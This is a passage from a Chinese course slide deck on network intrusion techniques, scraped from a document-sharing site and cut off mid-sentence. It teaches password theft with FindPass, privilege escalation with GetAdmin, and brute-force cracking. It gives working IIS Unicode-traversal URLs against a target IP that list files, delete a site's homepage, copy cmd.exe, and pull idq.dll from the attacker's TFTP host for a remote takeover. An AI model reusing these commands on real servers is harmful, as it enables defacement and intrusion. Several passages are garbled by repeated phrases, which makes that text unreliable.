第五章 网络入侵.ppt
《第五章 网络入侵.ppt》由会员分享,可在线阅读,更多相关《第五章 网络入侵.ppt(79页珍藏版)》请在得力文库 - 分享文档赚钱的网站上搜索。
1、第五章 网络入侵 内容提要n本章是攻击技术中最重要的一章,介绍目前常用的网络攻击手段:n社会工程学攻击n物理攻击n暴力攻击n利用Unicode漏洞攻击n利用缓冲区溢出漏洞进行攻击等技术。n并结合实际,介绍流行的攻击工具的使用以及部分工具的代码实现。5.1 社会工程学攻击 n社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。n举个例子:一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和
2、他们的配偶、孩子的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。社会工程学攻击n目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造Emailn1、打电话请求密码 n尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。n2、伪造Emailn使用telnet,一个黑客可以截取任何一个身份证发送Email的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息
3、显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。5.2 物理攻击与防范 n物理安全是保护一些比较重要的设备不被接触。n物理安全比较难防,因为攻击往往来自能够接触到物理设备的用户。5.2.1获取管理员密码案例5-1 得到管理员密码n用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,如图5-1所示。案例5-1得到管理员密码n使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘
4、根目录,执行该程序,将得到当前用户得登录名,如图5-2所示。获取管理员密码FindPassn如果有多人登录同一台计算机,还可以查看其他用户的密码,语法如下:nFindPass.exe 计算机名 用户名 PID of winlogonn前两项参数容易知道,winlogon的进程号可以到任务管理器中查到,也可以利用pulist.exe查看。5.2.2 权限提升n有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。n其实不然,用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。案例5-2 普通用户建立管理员帐号n利用Ha
5、cker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,如图5-5所示。普通用户建立管理员帐号n输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如图5-6所示。5.3 暴力攻击n暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码。n一个黑客需要破解段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这
6、种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。5.3 暴力攻击n字典攻击是最常见的一种暴力攻击。z它通过使用某种具体的密码来缩小尝试的范围,大多数用户使用标准单词作为一个密码。n一个字典攻击试图通过利用包含单词列表的文件去破解密码。5.3.1字典文件 n一次一次字典攻击能否成功,很大因素上决定于字典文件。字典攻击能否成功,很大因素上决定于字典文件。一个好的字典文一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典
7、文件的机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。可以大大的提高破解效率。n一个一个字典文件字典文件本身就是一个标准的本身就是一个标准的文本文件文本文件,其中的每一行就代表一个,其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件,图可能的密码。目前有很多工具软件专门来创建字典文件,图5-8是一个简是一个简单的字典文件。单的字典文件。5.3.2 暴力破解操作系统密码 n字典文件为暴力破解提供了一条捷径,程序首先通
8、过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示n案例5-3 暴力破解操作系统密码 n比如使用图5-8所示的字典文件,利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来,如图5-9所示。n邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。n尤其七位全部是数字,更容易被破解。n案例5-4 电子邮箱暴力破解 n破解电子邮箱密码,一个比较著名的工具软件是:黑雨POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,主界面如图5-10所示。5.3.3 暴力破解邮箱密码5.3.4暴力破解软件密码 n目前许多软件都具有加密的功能,
9、比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话,同样容易被破解。n案例5-5 Office文档暴力破解 修改权限密码n在对话框中选择选项卡“安全性”,在打开权限密码和修改权限密码的两个文本框中都输入“999”,如图5-12所示。输入密码n保存并关闭该文档,然后再打开,就需要输入密码了,如图5-13所示。破解Word文档密码n该密码是三位的,使用工具软件,Advanced Office XP Password Recovery可以快速破解Word文档密码,主界面如图5-14所示。破解Word文档密码n点击工
10、具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息,如图5-15所示。破解Word文档密码n设置密码长度最短是一位,最长是三位,点击工具栏开始的图标,开始破解密码,大约两秒钟后,密码被破解了,如图5-16所示。5.4 Unicode漏洞专题 n通过通过打操作系统的补丁程序打操作系统的补丁程序,就可以,就可以消除漏洞消除漏洞。只要。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。了相关的补丁。nUnicode漏洞是漏洞是2000-10-17发布的,受影响的版本:发布的
11、,受影响的版本:nMicrosoft IIS 5.0+Microsoft Windows 2000系列版本系列版本nMicrosoft IIS 4.0+Microsoft Windows NT 4.0n消除该漏洞的方式是安装操作系统的补丁,只要安装消除该漏洞的方式是安装操作系统的补丁,只要安装了了SP1以后,该漏洞就不存在了。微软以后,该漏洞就不存在了。微软IIS 4.0和和5.0都存在利用扩展都存在利用扩展UNICODE字符取代字符取代/和和而能利而能利用用./目录遍历的漏洞。目录遍历的漏洞。5.4.1Unicode漏洞的检测方法n使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍
12、的X-Scan来对目标系统进行扫描,目标主机IP为:172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置如图5-17所示。Unicode漏洞的检测方法n将主机添加到目标地址,扫描结果如图5-18所示。Unicode漏洞的检测方法n可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如:n /scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dirn其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图5-19所示。U
13、nicode漏洞的检测方法nscripts目录一般系统盘根目录下的Inetpub目录下,如图5-20所示。Unicode漏洞的检测方法n在Windows的目录结构中,可以使用两个点和一个斜线“./”来访问上一级目录,在浏览器中利用“scripts/././”可以访问到系统盘根目录,访问“scripts/././winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。n浏览器地址栏中禁用符号“./”,但是可以使用符号“/”的Unicode的编码。比如“/scripts/.%c0%2f.
14、/winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。Unicode漏洞n此漏洞从中文此漏洞从中文IIS4.0+SP6开始,还影响中文开始,还影响中文WIN2000+IIS5.0、中文、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。在,台湾繁体中文也同样存在这样的漏洞。在NT4中中/编码为编码为“%c1%9c”或者或者“%c1%9c”,WIN2000英文版是英文版是“%c0%af”。n但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,但从国外某些站
15、点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。该编码存在于日文版、韩文版等操作系统。n%c1%pcn%c0%9vn%c0%qfn%c1%8sn%e0%80%afn利用该漏洞读取出计算机上目录列表,比如读取利用该漏洞读取出计算机上目录列表,比如读取C盘的目录盘的目录,只要在浏览器中输,只要在浏览器中输入入n“http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”利用Unicode漏洞读取系统盘目录 利用Unicode漏洞读取系统盘目录n利用语句得到对方计算机上装了
16、几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inin执行的结果如图5-22所示。5.4.2 利用Unicode漏洞删除主页n利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。n使用的语句是:nhttp
17、:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp利用Unicode漏洞删除主页拷贝文件n为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exen程序执行结果如图5-24所示。查看C盘的目录n以后使用cmd.exe命令就方便了
18、,比如查看C盘的目录,使用的语句就可以简化为:nhttp:/172.18.25.109/scripts/c.exe?/c+dir+c:n执行的结果如图5-25所示。案例5-7 利用Unicode漏洞入侵系统 n在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。n需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通文件传输协议TFTP(Text File Tra
19、nsmission Protocol)一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图5-26所示。利用Unicode漏洞入侵系统利用Unicode漏洞入侵系统n这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:n“http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”
20、,n命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件,执行成功的界面如图5-27所示。上载文件 查看scripts目录 n上传完毕后可以查看一下scripts目录,是否真的上传成功了。如图5-28所示。入侵对方主机 n说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。n拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:n“ispc.exe 172.18.25.109/scripts/idq.dll”,连接成功后就直
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 第五章 网络入侵 第五 网络 入侵
限制150内